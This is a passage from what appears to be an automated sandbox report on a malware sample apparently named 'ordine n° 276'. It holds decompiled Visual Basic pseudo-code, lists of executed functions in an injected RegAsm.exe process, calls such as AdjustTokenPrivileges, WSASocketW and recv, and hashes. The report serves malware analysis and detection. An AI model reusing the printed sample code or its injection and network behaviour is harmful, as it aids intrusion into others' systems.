				_v36 = 0;
				L004014AA();
				L004014AA();
				_t22 =  *0x416010; // 0x6202b8
				if(_t22 == 0) {
					_push(0x416010);
					_push(0x40de54);
					L0040155E();
					_t22 =  *0x416010; // 0x6202b8
				}
				_t24 =  &_v36;
				L0040154C();
				_t40 = _t24;
				_t26 =  *((intOrPtr*)( *_t40 + 0x1a8))(_t40, _t24,  *((intOrPtr*)( *_t22 + 0x370))(_t22));
				asm("fclex");
				if(_t26 < 0) {
					_push(0x1a8);
					_push(0x40da78);
					_push(_t40);
					_push(_t26);
					L00401558();
				}
				L00401552();
				_push(E00414C23);
				L00401528();
				L00401528();
				return _t26;
			}

0x00414b55
0x00414b64
0x00414b71
0x00414b74
0x00414b7d
0x00414b80
0x00414b86
0x00414b8f
0x00414b92
0x00414b95
0x00414b98
0x00414ba3
0x00414ba8
0x00414baf
0x00414bb1
0x00414bb6
0x00414bbb
0x00414bc0
0x00414bc0
0x00414bcf
0x00414bd3
0x00414bd8
0x00414bdd
0x00414be3
0x00414be7
0x00414be9
0x00414bee
0x00414bf3
0x00414bf4
0x00414bf5
0x00414bf5
0x00414bfd
0x00414c02
0x00414c15
0x00414c1d
0x00414c22

APIs

__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,004013F6), ref: 00414B98
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,004013F6), ref: 00414BA3
__vbaNew2.MSVBVM60(0040DE54,00416010,?,?,?,?,?,?,?,?,?,004013F6), ref: 00414BBB
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,004013F6), ref: 00414BD3
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DA78,000001A8,?,?,?,?,?,?,?,?,?,004013F6), ref: 00414BF5
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,004013F6), ref: 00414BFD
__vbaFreeStr.MSVBVM60(00414C23,?,?,?,?,?,?,?,?,?,004013F6), ref: 00414C15
__vbaFreeStr.MSVBVM60(00414C23,?,?,?,?,?,?,?,?,?,004013F6), ref: 00414C1D

Memory Dump Source

Source File: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$Free$Copy$CheckHresultNew2
String ID:
API String ID: 1874231197-0
Opcode ID: fde4b019575fe01bf2ab4270ccb542c93525dd41048d45adfc4a2eb51a9d193f
Instruction ID: 51800d8fba637dd745cd87c7f8b9eb506a03357ba0edb29b414d9ad3b754c26e
Opcode Fuzzy Hash: fde4b019575fe01bf2ab4270ccb542c93525dd41048d45adfc4a2eb51a9d193f
Instruction Fuzzy Hash: 9D211270940205ABCB00EFA5CC46EEEBBB8FF94704F10442AF446B71A1DB7C9546CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0041456A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0041456A(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr* _t15;
				intOrPtr* _t17;
				void* _t19;
				intOrPtr* _t21;
				intOrPtr _t31;

				_push(0x4013f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_v12 = _t31 - 0x28;
				_v8 = 0x401378;
				_t15 =  *0x416010; // 0x6202b8
				_v32 = _v32 & 0x00000000;
				if(_t15 == 0) {
					_push(0x416010);
					_push(0x40de54);
					L0040155E();
					_t15 =  *0x416010; // 0x6202b8
				}
				_t17 =  &_v32;
				L0040154C();
				_v40 = 0x80020004;
				_v48 = 0xa;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t21 = _t17;
				asm("movsd");
				_t19 =  *((intOrPtr*)( *_t21 + 0x1ec))(_t21, L"Busserviceanlgget7", _t17,  *((intOrPtr*)( *_t15 + 0x364))(_t15));
				asm("fclex");
				if(_t19 < 0) {
					_push(0x1ec);
					_push(0x40dc14);
					_push(_t21);
					_push(_t19);
					L00401558();
				}
				L00401552();
				_v28 = 0xd9e23180;
				_v24 = 0x5aff;
				_push(E0041462E);
				return _t19;
			}

0x0041456f
0x0041457a
0x0041457b
0x00414588
0x0041458b
0x00414592
0x00414597
0x0041459d
0x0041459f
0x004145a4
0x004145a9
0x004145ae
0x004145ae
0x004145bd
0x004145c1
0x004145cb
0x004145d2
0x004145dc
0x004145dd
0x004145de
0x004145df
0x004145e9
0x004145ea
0x004145f2
0x004145f4
0x004145f6
0x004145fb
0x00414600
0x00414601
0x00414602
0x00414602
0x0041460a
0x0041460f
0x00414616
0x0041461d
0x00000000

APIs

__vbaNew2.MSVBVM60(0040DE54,00416010), ref: 004145A9
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004145C1
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040DC14,000001EC), ref: 00414602
__vbaFreeObj.MSVBVM60 ref: 0041460A

Strings

Busserviceanlgget7, xrefs: 004145E3

Memory Dump Source

Source File: 00000000.00000002.749114091.000000000040C000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.749098092.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749102468.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749107372.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.749120964.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.749125569.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: __vba$CheckFreeHresultNew2
String ID: Busserviceanlgget7
API String ID: 1645334062-1059369656
Opcode ID: a747300bce16393301de8768629110e32db773eb70c1b2a51f1ca544af465d24
Instruction ID: c78a2d5b5caeaaa3be94bac5d1fe148632e6997c9e6fdd5a7960b38c7640c24c
Opcode Fuzzy Hash: a747300bce16393301de8768629110e32db773eb70c1b2a51f1ca544af465d24
Instruction Fuzzy Hash: 701133B1A00704BBDB00EF99CD46B9F7AB8EB49704F104069F501BB191D7BD99058B99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 6412 Parent PID: 6992 RegAsm.exeCOMMON

Execution Graph

Execution Coverage:	30.1%
Dynamic/Decrypted Code Coverage:	98.4%
Signature Coverage:	2.3%
Total number of Nodes:	129
Total number of Limit Nodes:	7

Executed Functions

Function 01126A08, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 829
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0112715D

Strings

8., xrefs: 01126B60

Memory Dump Source

Source File: 00000007.00000002.1031807611.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1120000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: 8.
API String ID: 2994545307-1672296076
Opcode ID: 0fec1c8a0d572449bbec57eae6969a2d0a6ba61fdd8b2f92b9e333f515135347
Instruction ID: f7dfb25d63b1a3b9afb7caa6b991ce9f46eaba8012bae50d5396b5778876f0cd
Opcode Fuzzy Hash: 0fec1c8a0d572449bbec57eae6969a2d0a6ba61fdd8b2f92b9e333f515135347
Instruction Fuzzy Hash: 48624C35E006298FCF25DF64C848B9EBBF2BF89304F1585A9E909AB260DB719D45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DAF07, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D7DAF87

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 29803208476d507a6cd72d5d28a8c4477291f6f3e82c8db44e7fa19ef612734d
Instruction ID: 3e90fd030f0dd48c2ea6fa028173bb0e58e737398462c198071454e4fd9423e7
Opcode Fuzzy Hash: 29803208476d507a6cd72d5d28a8c4477291f6f3e82c8db44e7fa19ef612734d
Instruction Fuzzy Hash: 1D219FB65097849FEB128F25DC40B52BFB4EF16220F0984DAE9858F563D270D918CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DB089, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 1D7DB0F5

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 5679d153c4adf1bae974bad36e15a80a9e11c6fd2ec5917e77fdcda8cf0e175e
Instruction ID: 8600c2bc7c6b7dd01c66084d3febed33f84ff7d20aca1df8175fa0d4f6acf325
Opcode Fuzzy Hash: 5679d153c4adf1bae974bad36e15a80a9e11c6fd2ec5917e77fdcda8cf0e175e
Instruction Fuzzy Hash: 33118E724097C49FD7228F15DC45A62FFB4EF06324F0984DAE9848F163D275A918DB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DAF3E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D7DAF87

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 10c24c74e989a922a78bcccd8854d20fced25446cd2abf9821fd12d116222105
Instruction ID: 70414584dc22876525ac1690324d8d473ccf9dee31e0e2e2cd77b5823794e0cf
Opcode Fuzzy Hash: 10c24c74e989a922a78bcccd8854d20fced25446cd2abf9821fd12d116222105
Instruction Fuzzy Hash: 4E119AB16007009FDB61CF66D884B56FBE4FF04220F08C8AAED898B656D335E418CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DA09A, Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 1D7DA0D5

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: cdc6cf786f683c3fc1dc9ca376bba9d80be145ce64cee084c902e6101c623d13
Instruction ID: 6f51b8961222be61e8657b33f2278a009fdb6a628aeb6351f7fdd93cb54683a5
Opcode Fuzzy Hash: cdc6cf786f683c3fc1dc9ca376bba9d80be145ce64cee084c902e6101c623d13
Instruction Fuzzy Hash: C4019A714007409FDB61DF5AD884B52FBA0FF14720F08C4AADD488B656E375A418CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DB0BA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 1D7DB0F5

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 142dd252c936290f75d6d0713daf30180861389e8ce51e04faa1887230868050
Instruction ID: 016e256f2446be588b2b208fbaa24471692ca5dba435e71e607a0320b1b2b0cd
Opcode Fuzzy Hash: 142dd252c936290f75d6d0713daf30180861389e8ce51e04faa1887230868050
Instruction Fuzzy Hash: 7B0178315007449FDB618F46D885B22FBB0EF08720F08C49ADD894B656D376A418CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1FBB32FA, Relevance: 8.2, APIs: 1, Strings: 3, Instructions: 1239libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1FBB36A2

Strings

:@fq, xrefs: 1FBB4BE2
:@fq, xrefs: 1FBB47BE
:@fq, xrefs: 1FBB3733

Memory Dump Source

Source File: 00000007.00000002.1036188847.000000001FBB0000.00000040.00000001.sdmp, Offset: 1FBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1fbb0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@fq$:@fq$:@fq
API String ID: 2994545307-3738185570
Opcode ID: 1365735d211fa3ba0165fecd5034b914ae171be08ba838110aa2bce0af5a7b5d
Instruction ID: 2ed78e660d61f05fcb88e36175c593258f16c14dcba6f2e3b3951fc803dcc861
Opcode Fuzzy Hash: 1365735d211fa3ba0165fecd5034b914ae171be08ba838110aa2bce0af5a7b5d
Instruction Fuzzy Hash: 91D2B574A016298FCB64DF68DC84BADBBB2FB49301F5481EAD809A7354DB359E81CF14

Uniqueness

Uniqueness Score: -1.00%

Function 1FBB332A, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 691libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1FBB36A2

Strings

:@fq, xrefs: 1FBB3733

Memory Dump Source

Source File: 00000007.00000002.1036188847.000000001FBB0000.00000040.00000001.sdmp, Offset: 1FBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1fbb0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@fq
API String ID: 2994545307-3673016210
Opcode ID: a99e905b540f6c358fc66b3e689c83c77b6153aa9095e3209f45f4b7fdb77962
Instruction ID: 74cf03fbfb23b82ef1215320f656d0fadfda5fa31823340426f7228eecdb5c15
Opcode Fuzzy Hash: a99e905b540f6c358fc66b3e689c83c77b6153aa9095e3209f45f4b7fdb77962
Instruction Fuzzy Hash: 6372B174E016298FCB60DF68DC84AADBBB2FB49311F5481EAD949A3314DB319E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1FBB337E, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 679libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1FBB36A2

Strings

:@fq, xrefs: 1FBB3733

Memory Dump Source

Source File: 00000007.00000002.1036188847.000000001FBB0000.00000040.00000001.sdmp, Offset: 1FBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1fbb0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@fq
API String ID: 2994545307-3673016210
Opcode ID: 6681d0518ad0b3f16a9d072bdd7e58374622f44cd38862acfb2a28fc75a492ad
Instruction ID: 82398fbd9bf1a8e5b1fbbfa5f49124b3207c52b8dd189a616219a468a740e631
Opcode Fuzzy Hash: 6681d0518ad0b3f16a9d072bdd7e58374622f44cd38862acfb2a28fc75a492ad
Instruction Fuzzy Hash: F072B274E016299FCB60DF68DC84AADBBB2FB49311F5481EAD909A3314DB319E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1FBB33C9, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 671libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1FBB36A2

Strings

:@fq, xrefs: 1FBB3733

Memory Dump Source

Source File: 00000007.00000002.1036188847.000000001FBB0000.00000040.00000001.sdmp, Offset: 1FBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1fbb0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@fq
API String ID: 2994545307-3673016210
Opcode ID: bc0f5c3e8e49acedbdaad62d7bd1fa758c4930577107662bd0cb1138e2378625
Instruction ID: 93aa75e5ad8fd3dc90a73a4ec757230881e56f31056bb6ef8c63b0e632cfd540
Opcode Fuzzy Hash: bc0f5c3e8e49acedbdaad62d7bd1fa758c4930577107662bd0cb1138e2378625
Instruction Fuzzy Hash: F172B274E016299FCB60DF68DC84AADBBB2FB49311F5481EAD909A3314DB319E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1FBB341D, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 661libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1FBB36A2

Strings

:@fq, xrefs: 1FBB3733

Memory Dump Source

Source File: 00000007.00000002.1036188847.000000001FBB0000.00000040.00000001.sdmp, Offset: 1FBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1fbb0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@fq
API String ID: 2994545307-3673016210
Opcode ID: b0b80bb8cd6e00e815884315ea88560906e1313513b7c58275c3dcc1a3156910
Instruction ID: 44e921322b9d9dc007da4f0d774cc498d988eae282354d9519e2c39fcff66d6d
Opcode Fuzzy Hash: b0b80bb8cd6e00e815884315ea88560906e1313513b7c58275c3dcc1a3156910
Instruction Fuzzy Hash: 6572B274E016298FCB60DF68DC84AADBBB2FB49311F5481EAD909A3314DB319E81CF14

Uniqueness

Uniqueness Score: -1.00%

Function 1FBB3471, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 651libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1FBB36A2

Strings

:@fq, xrefs: 1FBB3733

Memory Dump Source

Source File: 00000007.00000002.1036188847.000000001FBB0000.00000040.00000001.sdmp, Offset: 1FBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1fbb0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@fq
API String ID: 2994545307-3673016210
Opcode ID: f298bcfec82f0a97b95081a047be7f1155356fe23205aebb00d161bee7b4005a
Instruction ID: 67dee9c658b9bd4fccc631b821a1d9cabedb158e3eba3a7a628a47177459ea06
Opcode Fuzzy Hash: f298bcfec82f0a97b95081a047be7f1155356fe23205aebb00d161bee7b4005a
Instruction Fuzzy Hash: D762B274E016299FCB60DF68DC84AADBBB2FB49311F5481EAD909A3314DB319E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1FBB34C5, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 641libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1FBB36A2

Strings

:@fq, xrefs: 1FBB3733

Memory Dump Source

Source File: 00000007.00000002.1036188847.000000001FBB0000.00000040.00000001.sdmp, Offset: 1FBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1fbb0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@fq
API String ID: 2994545307-3673016210
Opcode ID: 9bd7d3c302bd100f0c690197d577598f54cadac68ae7f96b0d10f74632913257
Instruction ID: ba00d10263cc448737268024e60202c207b4a5ba4dfba2fdaeb68ee71e7d74b5
Opcode Fuzzy Hash: 9bd7d3c302bd100f0c690197d577598f54cadac68ae7f96b0d10f74632913257
Instruction Fuzzy Hash: 9C62B274E016299FCB60DF68DC84AADBBB2FB49311F5481EAD909A3314DB319E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1FBB3519, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 631libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1FBB36A2

Strings

:@fq, xrefs: 1FBB3733

Memory Dump Source

Source File: 00000007.00000002.1036188847.000000001FBB0000.00000040.00000001.sdmp, Offset: 1FBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1fbb0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@fq
API String ID: 2994545307-3673016210
Opcode ID: 6364a7827b76abd85e8392a425507ae9bd037db2b76e92e6cfae03a79d6f2dec
Instruction ID: 7eb8b9f9c20a55a1ccf9635bb3d9c0424f8cd0f25f8b17c14da9d7d227e5617f
Opcode Fuzzy Hash: 6364a7827b76abd85e8392a425507ae9bd037db2b76e92e6cfae03a79d6f2dec
Instruction Fuzzy Hash: A662B274E016298FCB60DF68DC84AADBBB2FB49311F5481EAD909A3314DB319E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1FBB356D, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 621libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1FBB36A2

Strings

:@fq, xrefs: 1FBB3733

Memory Dump Source

Source File: 00000007.00000002.1036188847.000000001FBB0000.00000040.00000001.sdmp, Offset: 1FBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1fbb0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: :@fq
API String ID: 2994545307-3673016210
Opcode ID: cf48e83d7856de932f57fe21bc983a180904ae8fa8453a9b6bd8161ed7767550
Instruction ID: 7284490363d6f12061445918fb3657404f60cf2843b74f5cb90109415c5416a8
Opcode Fuzzy Hash: cf48e83d7856de932f57fe21bc983a180904ae8fa8453a9b6bd8161ed7767550
Instruction Fuzzy Hash: F662B374E016698FCB60DF68DC84AADBBB2FB49311F5481EAD909A3314DB319E81CF14

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2504, Relevance: 3.1, APIs: 2, Instructions: 113
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32(?,?), ref: 00CF24AD
shutdown.WS2_32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF2598

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: CreateMutexshutdown
String ID:
API String ID: 3897568296-0
Opcode ID: 9a581481e4820f6125927c878f56719fea250c3061a2ec68b93b1fcc5b64731a
Instruction ID: d4be47367248296f64defe0d07cf2428115b36c4351147979a040a2e10e3dd44
Opcode Fuzzy Hash: 9a581481e4820f6125927c878f56719fea250c3061a2ec68b93b1fcc5b64731a
Instruction Fuzzy Hash: 9541E6B15053849FE712CF54DC85BA6BFA8EF41320F0884AAED448F293D3749909CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D392888, Relevance: 1.7, APIs: 1, Instructions: 202
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1D3928C8

Memory Dump Source

Source File: 00000007.00000002.1035057532.000000001D390000.00000040.00000001.sdmp, Offset: 1D390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d390000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f871f56a1b772e18da03b7d290ecb8ace728d9896953220e8f9896c9b71d5d50
Instruction ID: 316ac2b44661dd8fd1070c9f44856259ee25c069f9e2e4599e8cf6a595f1c144
Opcode Fuzzy Hash: f871f56a1b772e18da03b7d290ecb8ace728d9896953220e8f9896c9b71d5d50
Instruction Fuzzy Hash: D5714834A0061ADFCB18DFB4C499BAEBBF2AF88311F518529D406EB354DB74A845CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01128EC9, Relevance: 1.7, APIs: 1, Instructions: 181
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01128F8D

Memory Dump Source

Source File: 00000007.00000002.1031807611.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1120000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6615cb57e56b397e9cf44740f0407287412b521f050ff929d78b01e3f6acb17
Instruction ID: df3529db812ba28fcd9b06c687785af39547ad7c7064ce0b018cb59042cb9dc1
Opcode Fuzzy Hash: c6615cb57e56b397e9cf44740f0407287412b521f050ff929d78b01e3f6acb17
Instruction Fuzzy Hash: F751A230B042199FCB059B78D884AAEBBF6FF88314F258569E505DB285EF35EC05C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01128F28, Relevance: 1.7, APIs: 1, Instructions: 155
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01128F8D

Memory Dump Source

Source File: 00000007.00000002.1031807611.0000000001120000.00000040.00000001.sdmp, Offset: 01120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1120000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 49792553912a7ba642127653591f94358d45a075714c01ec31059658c76971ab
Instruction ID: f143578a18f876156ce5bde41d3f286c268b11a3335a2abada8f7c75694ac372
Opcode Fuzzy Hash: 49792553912a7ba642127653591f94358d45a075714c01ec31059658c76971ab
Instruction Fuzzy Hash: E0514F30B002199FCB04DBB8D488AAEB7B6FF88354F258529E505DB244EF35ED05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1A81, Relevance: 1.6, APIs: 1, Instructions: 106
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 00CF1B4A

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 1df7a613881cd7207a81541762e17498da85b6f90ac5399b8b070fc1fdc339e5
Instruction ID: 3f26732e03e03e73428ef24f30d173d316e8c71290b0548d2370837d8dcf9bb2
Opcode Fuzzy Hash: 1df7a613881cd7207a81541762e17498da85b6f90ac5399b8b070fc1fdc339e5
Instruction Fuzzy Hash: 0F417E7140D7C0AFE7238B658C54B66BFB4AF07310F0985DBE9C48F1A3D265A909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF285B, Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(?,00000EB4), ref: 00CF292F

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: c218b2e20c2a031f1a28b88c2811904cf80ce54939bcc6b2048869c37d4e3c63
Instruction ID: e0260834215c74ca20ec883fea95f5380f9d6e5ddf555121a517e7f3010aef13
Opcode Fuzzy Hash: c218b2e20c2a031f1a28b88c2811904cf80ce54939bcc6b2048869c37d4e3c63
Instruction Fuzzy Hash: 2B31B471004345AFE722CB65CC84FA6FFACEF05310F14499AE9849B182D275A949CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2B0D, Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF2BC1

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 97145a57ffb601ab2c7a9ff6de6d6196b90cbccb12163db5251d2f7c0f92bf97
Instruction ID: a992014f7a185c6fd92aec3ff2e197a46f7594d2a2c36cdaefc7f55f368ee54d
Opcode Fuzzy Hash: 97145a57ffb601ab2c7a9ff6de6d6196b90cbccb12163db5251d2f7c0f92bf97
Instruction Fuzzy Hash: 03316171105784AFE722CF65DC44F62BFB8EF06310F08849AED859B162D334E909DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1D392827, Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1D3928C8

Memory Dump Source

Source File: 00000007.00000002.1035057532.000000001D390000.00000040.00000001.sdmp, Offset: 1D390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d390000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e60868d8e592ef75f1992b8dff5b57c23aee0ec1e93c78994c5cbbd366ebdf52
